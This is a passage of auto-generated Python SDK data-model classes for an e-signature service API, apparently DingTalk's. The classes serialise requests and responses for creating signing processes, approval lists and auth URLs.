result['accountName'] = self.account_name
if self.org_name is not None:
result['orgName'] = self.org_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('accountType') is not None:
self.account_type = m.get('accountType')
if m.get('account') is not None:
self.account = m.get('account')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('accountName') is not None:
self.account_name = m.get('accountName')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
return self
class CreateProcessRequestSourceInfo(TeaModel):
def __init__(
self,
show_text: str = None,
pc_url: str = None,
mobile_url: str = None,
):
self.show_text = show_text
self.pc_url = pc_url
self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.show_text is not None:
result['showText'] = self.show_text
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('showText') is not None:
self.show_text = m.get('showText')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
class CreateProcessRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
initiator_user_id: str = None,
task_name: str = None,
sign_end_time: int = None,
redirect_url: str = None,
files: List[CreateProcessRequestFiles] = None,
participants: List[CreateProcessRequestParticipants] = None,
ccs: List[CreateProcessRequestCcs] = None,
source_info: CreateProcessRequestSourceInfo = None,
):
self.ding_corp_id = ding_corp_id
self.initiator_user_id = initiator_user_id
self.task_name = task_name
self.sign_end_time = sign_end_time
self.redirect_url = redirect_url
self.files = files
self.participants = participants
self.ccs = ccs
self.source_info = source_info
def validate(self):
if self.files:
for k in self.files:
if k:
k.validate()
if self.participants:
for k in self.participants:
if k:
k.validate()
if self.ccs:
for k in self.ccs:
if k:
k.validate()
if self.source_info:
self.source_info.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.initiator_user_id is not None:
result['initiatorUserId'] = self.initiator_user_id
if self.task_name is not None:
result['taskName'] = self.task_name
if self.sign_end_time is not None:
result['signEndTime'] = self.sign_end_time
if self.redirect_url is not None:
result['redirectUrl'] = self.redirect_url
result['files'] = []
if self.files is not None:
for k in self.files:
result['files'].append(k.to_map() if k else None)
result['participants'] = []
if self.participants is not None:
for k in self.participants:
result['participants'].append(k.to_map() if k else None)
result['ccs'] = []
if self.ccs is not None:
for k in self.ccs:
result['ccs'].append(k.to_map() if k else None)
if self.source_info is not None:
result['sourceInfo'] = self.source_info.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('initiatorUserId') is not None:
self.initiator_user_id = m.get('initiatorUserId')
if m.get('taskName') is not None:
self.task_name = m.get('taskName')
if m.get('signEndTime') is not None:
self.sign_end_time = m.get('signEndTime')
if m.get('redirectUrl') is not None:
self.redirect_url = m.get('redirectUrl')
self.files = []
if m.get('files') is not None:
for k in m.get('files'):
temp_model = CreateProcessRequestFiles()
self.files.append(temp_model.from_map(k))
self.participants = []
if m.get('participants') is not None:
for k in m.get('participants'):
temp_model = CreateProcessRequestParticipants()
self.participants.append(temp_model.from_map(k))
self.ccs = []
if m.get('ccs') is not None:
for k in m.get('ccs'):
temp_model = CreateProcessRequestCcs()
self.ccs.append(temp_model.from_map(k))
if m.get('sourceInfo') is not None:
temp_model = CreateProcessRequestSourceInfo()
self.source_info = temp_model.from_map(m['sourceInfo'])
return self
class CreateProcessResponseBody(TeaModel):
def __init__(
self,
task_id: str = None,
):
self.task_id = task_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.task_id is not None:
result['taskId'] = self.task_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('taskId') is not None:
self.task_id = m.get('taskId')
return self
class CreateProcessResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CreateProcessResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CreateProcessResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetSignDetailHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetSignDetailResponseBodySigners(TeaModel):
def __init__(
self,
sign_status: float = None,
signer_name: str = None,
):
self.sign_status = sign_status
self.signer_name = signer_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.sign_status is not None:
result['signStatus'] = self.sign_status
if self.signer_name is not None:
result['signerName'] = self.signer_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('signStatus') is not None:
self.sign_status = m.get('signStatus')
if m.get('signerName') is not None:
self.signer_name = m.get('signerName')
return self
class GetSignDetailResponseBody(TeaModel):
def __init__(
self,
business_scene: str = None,
flow_status: float = None,
signers: List[GetSignDetailResponseBodySigners] = None,
):
self.business_scene = business_scene
self.flow_status = flow_status
self.signers = signers
def validate(self):
if self.signers:
for k in self.signers:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.business_scene is not None:
result['businessScene'] = self.business_scene
if self.flow_status is not None:
result['flowStatus'] = self.flow_status
result['signers'] = []
if self.signers is not None:
for k in self.signers:
result['signers'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('businessScene') is not None:
self.business_scene = m.get('businessScene')
if m.get('flowStatus') is not None:
self.flow_status = m.get('flowStatus')
self.signers = []
if m.get('signers') is not None:
for k in m.get('signers'):
temp_model = GetSignDetailResponseBodySigners()
self.signers.append(temp_model.from_map(k))
return self
class GetSignDetailResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetSignDetailResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetSignDetailResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetAttachsApprovalHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
tsign_open_app_id: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.tsign_open_app_id = tsign_open_app_id
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.tsign_open_app_id is not None:
result['tsignOpenAppId'] = self.tsign_open_app_id
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('tsignOpenAppId') is not None:
self.tsign_open_app_id = m.get('tsignOpenAppId')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetAttachsApprovalResponseBodyDataFiles(TeaModel):
def __init__(
self,
file_name: str = None,
original_file_url: str = None,
sign_finish_file_url: str = None,
):
self.file_name = file_name
self.original_file_url = original_file_url
self.sign_finish_file_url = sign_finish_file_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_name is not None:
result['fileName'] = self.file_name
if self.original_file_url is not None:
result['originalFileUrl'] = self.original_file_url
if self.sign_finish_file_url is not None:
result['signFinishFileUrl'] = self.sign_finish_file_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileName') is not None:
self.file_name = m.get('fileName')
if m.get('originalFileUrl') is not None:
self.original_file_url = m.get('originalFileUrl')
if m.get('signFinishFileUrl') is not None:
self.sign_finish_file_url = m.get('signFinishFileUrl')
return self
class GetAttachsApprovalResponseBodyData(TeaModel):
def __init__(
self,
flow_id: str = None,
status: str = None,
files: List[GetAttachsApprovalResponseBodyDataFiles] = None,
):
self.flow_id = flow_id
self.status = status
self.files = files
def validate(self):
if self.files:
for k in self.files:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.flow_id is not None:
result['flowId'] = self.flow_id
if self.status is not None:
result['status'] = self.status
result['files'] = []
if self.files is not None:
for k in self.files:
result['files'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('flowId') is not None:
self.flow_id = m.get('flowId')
if m.get('status') is not None:
self.status = m.get('status')
self.files = []
if m.get('files') is not None:
for k in m.get('files'):
temp_model = GetAttachsApprovalResponseBodyDataFiles()
self.files.append(temp_model.from_map(k))
return self
class GetAttachsApprovalResponseBody(TeaModel):
def __init__(
self,
data: List[GetAttachsApprovalResponseBodyData] = None,
):
# Id of the request
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetAttachsApprovalResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class GetAttachsApprovalResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetAttachsApprovalResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetAttachsApprovalResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ProcessStartHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ProcessStartRequestFiles(TeaModel):
def __init__(
self,
file_id: str = None,
file_name: str = None,
):
self.file_id = file_id
self.file_name = file_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.file_name is not None:
result['fileName'] = self.file_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('fileName') is not None:
self.file_name = m.get('fileName')
return self
class ProcessStartRequestParticipants(TeaModel):
def __init__(
self,
account_type: str = None,
sign_requirements: str = None,
ding_corp_id: str = None,
user_id: str = None,
account: str = None,
account_name: str = None,
org_name: str = None,
):
# 用户类型("DING_USER":钉钉用户,"OUTER_USER":外部用户)
self.account_type = account_type
# 签署印章类型(1:企业章 2:个人章 1,2:个人和企业章)
self.sign_requirements = sign_requirements
self.ding_corp_id = ding_corp_id
# DING_USER必填
self.user_id = user_id
# OUTER_USER必填
self.account = account
# OUTER_USER必填
self.account_name = account_name
# OUTER_USER需要盖企业章必填(如果不传,默认会赋值当前企业名称)
self.org_name = org_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.account_type is not None:
result['accountType'] = self.account_type
if self.sign_requirements is not None:
result['signRequirements'] = self.sign_requirements
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.user_id is not None:
result['userId'] = self.user_id
if self.account is not None:
result['account'] = self.account
if self.account_name is not None:
result['accountName'] = self.account_name
if self.org_name is not None:
result['orgName'] = self.org_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('accountType') is not None:
self.account_type = m.get('accountType')
if m.get('signRequirements') is not None:
self.sign_requirements = m.get('signRequirements')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('account') is not None:
self.account = m.get('account')
if m.get('accountName') is not None:
self.account_name = m.get('accountName')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
return self
class ProcessStartRequestCcs(TeaModel):
def __init__(
self,
account_type: str = None,
ding_corp_id: str = None,
user_id: str = None,
account: str = None,
account_name: str = None,
org_name: str = None,
):
# 用户类型("DING_USER":钉钉用户,"OUTER_USER":外部用户)
self.account_type = account_type
self.ding_corp_id = ding_corp_id
# DING_USER必填
self.user_id = user_id
# OUTER_USER必填
self.account = account
# OUTER_USER必填
self.account_name = account_name
# 发给企业方必填
self.org_name = org_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.account_type is not None:
result['accountType'] = self.account_type
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.user_id is not None:
result['userId'] = self.user_id
if self.account is not None:
result['account'] = self.account
if self.account_name is not None:
result['accountName'] = self.account_name
if self.org_name is not None:
result['orgName'] = self.org_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('accountType') is not None:
self.account_type = m.get('accountType')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('account') is not None:
self.account = m.get('account')
if m.get('accountName') is not None:
self.account_name = m.get('accountName')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
return self
class ProcessStartRequestSourceInfo(TeaModel):
def __init__(
self,
show_text: str = None,
pc_url: str = None,
mobile_url: str = None,
):
# 展示文案
self.show_text = show_text
# pc端跳转地址
self.pc_url = pc_url
# 移动端跳转地址
self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.show_text is not None:
result['showText'] = self.show_text
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('showText') is not None:
self.show_text = m.get('showText')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
class ProcessStartRequest(TeaModel):
def __init__(
self,
auto_start: str = None,
initiator_user_id: str = None,
ding_corp_id: str = None,
task_name: str = None,
redirect_url: str = None,
files: List[ProcessStartRequestFiles] = None,
participants: List[ProcessStartRequestParticipants] = None,
ccs: List[ProcessStartRequestCcs] = None,
source_info: ProcessStartRequestSourceInfo = None,
):
# 是否跳过发起签署页直接发起
self.auto_start = auto_start
# 发起方userId
self.initiator_user_id = initiator_user_id
self.ding_corp_id = ding_corp_id
# 任务名称(默认文件名)
self.task_name = task_name
# 回跳地址
self.redirect_url = redirect_url
# 文件列表
self.files = files
# 参与方列表
self.participants = participants
# 抄送人列表
self.ccs = ccs
# 来源信息(目前支持传入审批信息和跳转地址)
self.source_info = source_info
def validate(self):
if self.files:
for k in self.files:
if k:
k.validate()
if self.participants:
for k in self.participants:
if k:
k.validate()
if self.ccs:
for k in self.ccs:
if k:
k.validate()
if self.source_info:
self.source_info.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.auto_start is not None:
result['autoStart'] = self.auto_start
if self.initiator_user_id is not None:
result['initiatorUserId'] = self.initiator_user_id
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.task_name is not None:
result['taskName'] = self.task_name
if self.redirect_url is not None:
result['redirectUrl'] = self.redirect_url
result['files'] = []
if self.files is not None:
for k in self.files:
result['files'].append(k.to_map() if k else None)
result['participants'] = []
if self.participants is not None:
for k in self.participants:
result['participants'].append(k.to_map() if k else None)
result['ccs'] = []
if self.ccs is not None:
for k in self.ccs:
result['ccs'].append(k.to_map() if k else None)
if self.source_info is not None:
result['sourceInfo'] = self.source_info.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('autoStart') is not None:
self.auto_start = m.get('autoStart')
if m.get('initiatorUserId') is not None:
self.initiator_user_id = m.get('initiatorUserId')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('taskName') is not None:
self.task_name = m.get('taskName')
if m.get('redirectUrl') is not None:
self.redirect_url = m.get('redirectUrl')
self.files = []
if m.get('files') is not None:
for k in m.get('files'):
temp_model = ProcessStartRequestFiles()
self.files.append(temp_model.from_map(k))
self.participants = []
if m.get('participants') is not None:
for k in m.get('participants'):
temp_model = ProcessStartRequestParticipants()
self.participants.append(temp_model.from_map(k))
self.ccs = []
if m.get('ccs') is not None:
for k in m.get('ccs'):
temp_model = ProcessStartRequestCcs()
self.ccs.append(temp_model.from_map(k))
if m.get('sourceInfo') is not None:
temp_model = ProcessStartRequestSourceInfo()
self.source_info = temp_model.from_map(m['sourceInfo'])
return self
class ProcessStartResponseBody(TeaModel):
def __init__(
self,
task_id: str = None,
pc_url: str = None,
mobile_url: str = None,
):
self.task_id = task_id
self.pc_url = pc_url
self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.task_id is not None:
result['taskId'] = self.task_id
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('taskId') is not None:
self.task_id = m.get('taskId')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
class ProcessStartResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ProcessStartResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ProcessStartResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ApprovalListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ApprovalListResponseBodyDataApprovalNodes(TeaModel):
def __init__(
self,
approver_name: str = None,
status: str = None,
start_time: float = None,
approval_time: str = None,
):
self.approver_name = approver_name
self.status = status
self.start_time = start_time
self.approval_time = approval_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.approver_name is not None:
result['approverName'] = self.approver_name
if self.status is not None:
result['status'] = self.status
if self.start_time is not None:
result['startTime'] = self.start_time
if self.approval_time is not None:
result['approvalTime'] = self.approval_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('approverName') is not None:
self.approver_name = m.get('approverName')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('startTime') is not None:
self.start_time = m.get('startTime')
if m.get('approvalTime') is not None:
self.approval_time = m.get('approvalTime')
return self
class ApprovalListResponseBodyData(TeaModel):
def __init__(
self,
approval_name: str = None,
status: str = None,
refuse_reason: str = None,
sponsor_account_name: str = None,
start_time: float = None,
end_time: float = None,
seal_id_img: str = None,
approval_nodes: List[ApprovalListResponseBodyDataApprovalNodes] = None,
):
self.approval_name = approval_name
self.status = status
self.refuse_reason = refuse_reason
self.sponsor_account_name = sponsor_account_name
self.start_time = start_time
self.end_time = end_time
self.seal_id_img = seal_id_img
self.approval_nodes = approval_nodes
def validate(self):
if self.approval_nodes:
for k in self.approval_nodes:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.approval_name is not None:
result['approvalName'] = self.approval_name
if self.status is not None:
result['status'] = self.status
if self.refuse_reason is not None:
result['refuseReason'] = self.refuse_reason
if self.sponsor_account_name is not None:
result['sponsorAccountName'] = self.sponsor_account_name
if self.start_time is not None:
result['startTime'] = self.start_time
if self.end_time is not None:
result['endTime'] = self.end_time
if self.seal_id_img is not None:
result['sealIdImg'] = self.seal_id_img
result['approvalNodes'] = []
if self.approval_nodes is not None:
for k in self.approval_nodes:
result['approvalNodes'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('approvalName') is not None:
self.approval_name = m.get('approvalName')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('refuseReason') is not None:
self.refuse_reason = m.get('refuseReason')
if m.get('sponsorAccountName') is not None:
self.sponsor_account_name = m.get('sponsorAccountName')
if m.get('startTime') is not None:
self.start_time = m.get('startTime')
if m.get('endTime') is not None:
self.end_time = m.get('endTime')
if m.get('sealIdImg') is not None:
self.seal_id_img = m.get('sealIdImg')
self.approval_nodes = []
if m.get('approvalNodes') is not None:
for k in m.get('approvalNodes'):
temp_model = ApprovalListResponseBodyDataApprovalNodes()
self.approval_nodes.append(temp_model.from_map(k))
return self
class ApprovalListResponseBody(TeaModel):
def __init__(
self,
data: List[ApprovalListResponseBodyData] = None,
):
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = ApprovalListResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class ApprovalListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ApprovalListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ApprovalListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetAuthUrlHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetAuthUrlRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
redirect_url: str = None,
):
self.ding_corp_id = ding_corp_id
self.redirect_url = redirect_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.redirect_url is not None:
result['redirectUrl'] = self.redirect_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('redirectUrl') is not None:
self.redirect_url = m.get('redirectUrl')
return self
class GetAuthUrlResponseBody(TeaModel):
def __init__(
self,
task_id: str = None,
pc_url: str = None,
mobile_url: str = None,
):
self.task_id = task_id
self.pc_url = pc_url
self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.task_id is not None:
result['taskId'] = self.task_id
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('taskId') is not None:
self.task_id = m.get('taskId')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
class GetAuthUrlResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetAuthUrlResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetAuthUrlResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetCorpConsoleHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetCorpConsoleResponseBody(TeaModel):
def __init__(
self,
org_console_url: str = None,
):
self.org_console_url = org_console_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.org_console_url is not None:
result['orgConsoleUrl'] = self.org_console_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('orgConsoleUrl') is not None:
self.org_console_url = m.get('orgConsoleUrl')
return self
class GetCorpConsoleResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetCorpConsoleResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
